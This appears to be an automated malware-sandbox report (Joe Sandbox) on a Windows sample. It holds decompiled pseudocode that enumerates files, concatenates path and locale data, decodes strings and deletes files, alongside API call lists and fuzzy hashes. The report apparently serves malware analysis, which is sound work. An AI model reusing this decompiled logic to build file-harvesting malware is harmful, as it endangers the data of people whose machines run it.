                                                                                                                                                                        							_push(L"..");
                                                                                                                                                                        							_push( &_v608);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e0a0))() == 0) {
                                                                                                                                                                        								goto L11;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t57 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t149 =  *((intOrPtr*)( *0x40e000))(_t57, _t101,  &_v608);
                                                                                                                                                                        								_v36 = _t149;
                                                                                                                                                                        								_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t60 = E0040A69E( *0x40e044,  &_v8);
                                                                                                                                                                        								_t102 = _v8;
                                                                                                                                                                        								if(_t60 == 0) {
                                                                                                                                                                        									L16:
                                                                                                                                                                        									LocalFree(_t102);
                                                                                                                                                                        									LocalFree(_t149);
                                                                                                                                                                        									DeleteFileW(_t102);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_push(_t144);
                                                                                                                                                                        									_push(_t102);
                                                                                                                                                                        									_push(_t149);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        										goto L16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t68 =  *((intOrPtr*)( *0x40e03c))(_t102, 0x80000000, 1, _t144, 4, _t144, _t144);
                                                                                                                                                                        										_v32 = _t68;
                                                                                                                                                                        										GetFileSize(_t68, _t144);
                                                                                                                                                                        										_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        										_t71 =  *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8);
                                                                                                                                                                        										_t132 =  *0x40e1b4; // 0x6eedc0
                                                                                                                                                                        										_t72 = E0040A503(_t71, _t132);
                                                                                                                                                                        										_t133 =  *0x40e1b8; // 0x6d5c58
                                                                                                                                                                        										_t74 = E0040A503(E0040A503(_t72, _t133), _v24);
                                                                                                                                                                        										_t135 =  *0x40e1ec; // 0x6d5a58
                                                                                                                                                                        										_t76 = E0040A503(E0040A503(_t74, _t135), _a4);
                                                                                                                                                                        										_t137 =  *0x40e1ec; // 0x6d5a58
                                                                                                                                                                        										_t78 = E0040A503(E0040A503(_t76, _t137), _a8);
                                                                                                                                                                        										_t139 =  *0x40e1b8; // 0x6d5c58
                                                                                                                                                                        										_t80 = E0040A503(E0040A503(_t78, _t139),  &_v608);
                                                                                                                                                                        										_v12 = _t80;
                                                                                                                                                                        										_t81 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, _t144, _t80, 0xffffffff, _t144, _t144, _t144, _t144);
                                                                                                                                                                        										_v28 = _t81;
                                                                                                                                                                        										_t22 = _t81 + 0x40; // 0x40
                                                                                                                                                                        										_t145 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
                                                                                                                                                                        										_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        										_t84 = _v28;
                                                                                                                                                                        										if(_t84 == 0) {
                                                                                                                                                                        											LocalFree(_t145);
                                                                                                                                                                        											LocalFree(_v8);
                                                                                                                                                                        											goto L10;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(_t84);
                                                                                                                                                                        											_push(_t145);
                                                                                                                                                                        											_push(0xffffffff);
                                                                                                                                                                        											_push(_v12);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0xfde9);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e0e4))() == 0) {
                                                                                                                                                                        												LocalFree(_v12);
                                                                                                                                                                        												LocalFree(_t145);
                                                                                                                                                                        												LocalFree(_t102);
                                                                                                                                                                        												LocalFree(_t149);
                                                                                                                                                                        												LocalFree(_v8);
                                                                                                                                                                        												break;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_v52 = _v32;
                                                                                                                                                                        												_v56 = _t145;
                                                                                                                                                                        												_t98 =  *((intOrPtr*)( *0x40e13c))(_v8, _t102);
                                                                                                                                                                        												_t126 = _a16;
                                                                                                                                                                        												_v44 = _v44 & 0x00000000;
                                                                                                                                                                        												_v48 = _t98;
                                                                                                                                                                        												 *_t126 =  *_a16 + 1;
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												_t149 = _v36;
                                                                                                                                                                        												L10:
                                                                                                                                                                        												LocalFree(_t102);
                                                                                                                                                                        												LocalFree(_t149);
                                                                                                                                                                        												_t101 = _v40;
                                                                                                                                                                        												_t144 = 0;
                                                                                                                                                                        												goto L11;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						L13:
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_push( &_v652);
                                                                                                                                                                        						_push(_v16);
                                                                                                                                                                        					} while ( *((intOrPtr*)( *0x40e148))() != 0);
                                                                                                                                                                        					FindClose(_v16);
                                                                                                                                                                        					goto L13;
                                                                                                                                                                        				}
                                                                                                                                                                        				L14:
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}













































                                                                                                                                                                        0x004039ed
                                                                                                                                                                        0x004039ef
                                                                                                                                                                        0x004039f4
                                                                                                                                                                        0x004039fd
                                                                                                                                                                        0x00403a02
                                                                                                                                                                        0x00403a15
                                                                                                                                                                        0x00403a1d
                                                                                                                                                                        0x00403a22
                                                                                                                                                                        0x00403a24
                                                                                                                                                                        0x00403a2a
                                                                                                                                                                        0x00403a30
                                                                                                                                                                        0x00403a32
                                                                                                                                                                        0x00403a39
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403a3f
                                                                                                                                                                        0x00403a4a
                                                                                                                                                                        0x00403a4f
                                                                                                                                                                        0x00403a54
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403a5a
                                                                                                                                                                        0x00403a66
                                                                                                                                                                        0x00403a7f
                                                                                                                                                                        0x00403a88
                                                                                                                                                                        0x00403a90
                                                                                                                                                                        0x00403a93
                                                                                                                                                                        0x00403a98
                                                                                                                                                                        0x00403a9d
                                                                                                                                                                        0x00403c78
                                                                                                                                                                        0x00403c79
                                                                                                                                                                        0x00403c80
                                                                                                                                                                        0x00403c87
                                                                                                                                                                        0x00403aa3
                                                                                                                                                                        0x00403aa8
                                                                                                                                                                        0x00403aa9
                                                                                                                                                                        0x00403aaa
                                                                                                                                                                        0x00403aaf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403ab5
                                                                                                                                                                        0x00403ac7
                                                                                                                                                                        0x00403acb
                                                                                                                                                                        0x00403ace
                                                                                                                                                                        0x00403ae1
                                                                                                                                                                        0x00403af0
                                                                                                                                                                        0x00403af2
                                                                                                                                                                        0x00403afa
                                                                                                                                                                        0x00403aff
                                                                                                                                                                        0x00403b11
                                                                                                                                                                        0x00403b16
                                                                                                                                                                        0x00403b28
                                                                                                                                                                        0x00403b2d
                                                                                                                                                                        0x00403b3f
                                                                                                                                                                        0x00403b44
                                                                                                                                                                        0x00403b59
                                                                                                                                                                        0x00403b71
                                                                                                                                                                        0x00403b74
                                                                                                                                                                        0x00403b7c
                                                                                                                                                                        0x00403b7f
                                                                                                                                                                        0x00403b8d
                                                                                                                                                                        0x00403b98
                                                                                                                                                                        0x00403b9b
                                                                                                                                                                        0x00403ba0
                                                                                                                                                                        0x00403bfb
                                                                                                                                                                        0x00403c04
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403ba2
                                                                                                                                                                        0x00403baa
                                                                                                                                                                        0x00403bab
                                                                                                                                                                        0x00403bac
                                                                                                                                                                        0x00403bad
                                                                                                                                                                        0x00403bae
                                                                                                                                                                        0x00403bb0
                                                                                                                                                                        0x00403bb3
                                                                                                                                                                        0x00403bb4
                                                                                                                                                                        0x00403bbd
                                                                                                                                                                        0x00403c52
                                                                                                                                                                        0x00403c59
                                                                                                                                                                        0x00403c60
                                                                                                                                                                        0x00403c67
                                                                                                                                                                        0x00403c70
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403bc3
                                                                                                                                                                        0x00403bca
                                                                                                                                                                        0x00403bd2
                                                                                                                                                                        0x00403bd5
                                                                                                                                                                        0x00403bd7
                                                                                                                                                                        0x00403bdd
                                                                                                                                                                        0x00403be1
                                                                                                                                                                        0x00403bef
                                                                                                                                                                        0x00403bf1
                                                                                                                                                                        0x00403bf2
                                                                                                                                                                        0x00403bf3
                                                                                                                                                                        0x00403bf4
                                                                                                                                                                        0x00403bf5
                                                                                                                                                                        0x00403c0a
                                                                                                                                                                        0x00403c0b
                                                                                                                                                                        0x00403c12
                                                                                                                                                                        0x00403c18
                                                                                                                                                                        0x00403c1b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c1b
                                                                                                                                                                        0x00403bbd
                                                                                                                                                                        0x00403ba0
                                                                                                                                                                        0x00403aaf
                                                                                                                                                                        0x00403a9d
                                                                                                                                                                        0x00403a54
                                                                                                                                                                        0x00403c3f
                                                                                                                                                                        0x00403c42
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c1d
                                                                                                                                                                        0x00403c28
                                                                                                                                                                        0x00403c29
                                                                                                                                                                        0x00403c2e
                                                                                                                                                                        0x00403c39
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c39
                                                                                                                                                                        0x00403c4a
                                                                                                                                                                        0x00403c4e

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00403ACE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403BFB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C04
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C0B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C12
                                                                                                                                                                        • FindClose.KERNEL32(00000002), ref: 00403C39
                                                                                                                                                                        • LocalFree.KERNEL32(00000002), ref: 00403C42
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C52
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C59
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C60
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C67
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C70
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C79
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C80
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00403C87
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$Filelstrlen$AllocCloseDeleteFindGlobalSize
                                                                                                                                                                        • String ID: 8\m$XZm$X\m
                                                                                                                                                                        • API String ID: 2451396805-1047068749
                                                                                                                                                                        • Opcode ID: 9370600c59216989510f23ec487aef7104cddeb0ef86d2a44abe813380e230b8
                                                                                                                                                                        • Instruction ID: a054592f1a26ae81db5b8b4afeeb8fb0c3e9f03fa1f4561a45be05a4ad2e9d15
                                                                                                                                                                        • Opcode Fuzzy Hash: 9370600c59216989510f23ec487aef7104cddeb0ef86d2a44abe813380e230b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 64718571A00214AFDB04DFB2DD49EAE77B9EB84310F104939F515B7290DB749D11CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E00409064(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                        
                                                                                                                                                                        				_t13 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				GetLocaleInfoW(GetUserDefaultLCID(), 0x1001, _t13, 0x104);
                                                                                                                                                                        				wsprintfW(_t17,  *0x40e47c, _t13);
                                                                                                                                                                        				_t19 = _a4;
                                                                                                                                                                        				 *_t19 = E0040A503( *_t19, _t17);
                                                                                                                                                                        				LocalFree(_t13);
                                                                                                                                                                        				LocalFree(_t17);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}






                                                                                                                                                                        0x0040907e
                                                                                                                                                                        0x0040908f
                                                                                                                                                                        0x004090a3
                                                                                                                                                                        0x004090ad
                                                                                                                                                                        0x004090b3
                                                                                                                                                                        0x004090c3
                                                                                                                                                                        0x004090c5
                                                                                                                                                                        0x004090cc
                                                                                                                                                                        0x004090d9

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,00409A50,00000000), ref: 0040909C
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00409A50,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090A3
                                                                                                                                                                        • wsprintfW.USER32 ref: 004090AD
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090C5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090CC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$lstrlen$AllocDefaultGlobalInfoLocaleUserwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 539592093-0
                                                                                                                                                                        • Opcode ID: 76169cde5809fa79702d2641542e8c4a75ae3637547db9aa1a8f316083ef7260
                                                                                                                                                                        • Instruction ID: 624d8c4e8efa692e5b23cff9d3e49fd3310a2e312a93838384a0c37449368444
                                                                                                                                                                        • Opcode Fuzzy Hash: 76169cde5809fa79702d2641542e8c4a75ae3637547db9aa1a8f316083ef7260
                                                                                                                                                                        • Instruction Fuzzy Hash: 84F0C8B1200214BFF3005BA6AD89E6777ACEB48724F004435F748B7290CAB46C20866D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(0040687A,00000000), ref: 004064AB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040655B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406575
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004065CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 565018292-0
                                                                                                                                                                        • Opcode ID: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
                                                                                                                                                                        • Instruction ID: ac64a0b193ce7f41f530b5697522d6c2b33bbf0bf2498a0822923da046ee8569
                                                                                                                                                                        • Opcode Fuzzy Hash: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
                                                                                                                                                                        • Instruction Fuzzy Hash: 93417A71A00215AFEB14CBA6DD81FBEBBF8EF88710F104429F605F7290D774A9118B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCpyW.SHLWAPI(?,00000000), ref: 004017DB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004017E2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004017ED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2826327444-0
                                                                                                                                                                        • Opcode ID: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
                                                                                                                                                                        • Instruction ID: 0e35f1b792878b3a1d48bea3d62df56abb982cd26097e817133252b33d58790c
                                                                                                                                                                        • Opcode Fuzzy Hash: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D01DF72200115FBEB188BAAED84FAB77ACEF48350F000434F605F72A0DAB0DD1096B8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        • iqroq5112542785672901323, xrefs: 0040A20C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: iqroq5112542785672901323
                                                                                                                                                                        • API String ID: 0-2937663778
                                                                                                                                                                        • Opcode ID: 154cf3943ec8f6ec358a9f88ce128c597753e00986442f5e2a7e9fe34025ec4f
                                                                                                                                                                        • Instruction ID: dfc9d6c5e4fbc171aed8fd1b755dd2b3d2cfba8e4e0761005cd4e136b75d37ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 154cf3943ec8f6ec358a9f88ce128c597753e00986442f5e2a7e9fe34025ec4f
                                                                                                                                                                        • Instruction Fuzzy Hash: D0E06D315012256AE724D7F5EC49FAA77AC9B09214F1000A5E915E6380EAB4EE148AAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D8000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_6d8000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                        • Instruction ID: 1af5c5d21d7de403fdeb5870e5c330b82e4e83f1cc1ae76dcb98fbb31986646a
                                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                        • Instruction Fuzzy Hash: 22118E72740105EFD754DF55DC81EA673EAEB89370B29806AED08CB352E676EC02C760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cc3abbeb411ed60e74f6ddeee8f85890bcfd83d19f0f3362f9051b6dc7ab35d3
                                                                                                                                                                        • Instruction ID: 395fbee96700efcf13294783634cb000bafa4e7164606bd30abd8be72a67e938
                                                                                                                                                                        • Opcode Fuzzy Hash: cc3abbeb411ed60e74f6ddeee8f85890bcfd83d19f0f3362f9051b6dc7ab35d3
                                                                                                                                                                        • Instruction Fuzzy Hash: 79014472201121BFD7259B9BDC49E9B7FACEF4A7A0B000035F608E7350D6709D10C7A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C1C2
                                                                                                                                                                        • _wcscat_s.LIBCMTD ref: 0041C3DA
                                                                                                                                                                          • Part of subcall function 00429010: __errno.LIBCMTD ref: 00429064
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C3E3
                                                                                                                                                                        • _wcscat_s.LIBCMTD ref: 0041C412
                                                                                                                                                                          • Part of subcall function 00429010: _memset.LIBCMT ref: 004290EB
                                                                                                                                                                          • Part of subcall function 00429010: __errno.LIBCMTD ref: 00429129
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C41B
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C437
                                                                                                                                                                          • Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C444
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C4A5
                                                                                                                                                                        • __invoke_watson_if_oneof.LIBCMTD ref: 0041C4AD
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C4B5
                                                                                                                                                                        • _wcscpy_s.LIBCMTD ref: 0041C4F2
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C4FB
                                                                                                                                                                        • __invoke_watson_if_oneof.LIBCMTD ref: 0041C59E
                                                                                                                                                                        • _wcscpy_s.LIBCMTD ref: 0041C5D6
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C5DF
                                                                                                                                                                        • __itow_s.LIBCMTD ref: 0041C1B9
                                                                                                                                                                          • Part of subcall function 0042B800: _xtow_s@20.LIBCMTD ref: 0042B82B
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C248
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C255
                                                                                                                                                                        • __strftime_l.LIBCMTD ref: 0041C279
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C2AA
                                                                                                                                                                        • __invoke_watson_if_oneof.LIBCMTD ref: 0041C2B2
                                                                                                                                                                        • __errno.LIBCMTD ref: 0041C2BA
                                                                                                                                                                        • _wcscpy_s.LIBCMTD ref: 0041C2F7
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C300
                                                                                                                                                                        • _wcscpy_s.LIBCMTD ref: 0041C353
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C35C
                                                                                                                                                                        • _wcscat_s.LIBCMTD ref: 0041C38D
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0041C396
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$__invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__getptd_noexit__itow_s__strftime_l_memset_xtow_s@20
                                                                                                                                                                        • String ID: _@$,^@$RL$h ]@$hHY@$hHY@$t8j$t9j
                                                                                                                                                                        • API String ID: 154763593-3339620195
                                                                                                                                                                        • Opcode ID: 881b4aeba09eb3c435e12e92552ecad2261c4f15f16f2ed09f10854b13da102d
                                                                                                                                                                        • Instruction ID: 3eb14a9a913676cf952d3c5baa468fbbeb682016143a5da59d3750aa6422998d
                                                                                                                                                                        • Opcode Fuzzy Hash: 881b4aeba09eb3c435e12e92552ecad2261c4f15f16f2ed09f10854b13da102d
                                                                                                                                                                        • Instruction Fuzzy Hash: C60271B4A80714AADB20DF50DC86FDF7374AB14746F1041AAF608B62C1D7BC9A94CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                        			E00406D26(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, char* _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				signed int _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				intOrPtr* _v84;
                                                                                                                                                                        				intOrPtr* _v88;
                                                                                                                                                                        				void* _v92;
                                                                                                                                                                        				intOrPtr _t104;
                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                        				intOrPtr _t106;
                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                        				void* _t110;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t121;
                                                                                                                                                                        				void* _t132;
                                                                                                                                                                        				intOrPtr* _t133;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				void* _t142;
                                                                                                                                                                        				char* _t144;
                                                                                                                                                                        				void* _t146;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t160;
                                                                                                                                                                        				int _t163;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        				signed int _t167;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t210;
                                                                                                                                                                        				signed int _t212;
                                                                                                                                                                        				void* _t213;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t215;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        				void* _t228;
                                                                                                                                                                        				void* _t240;
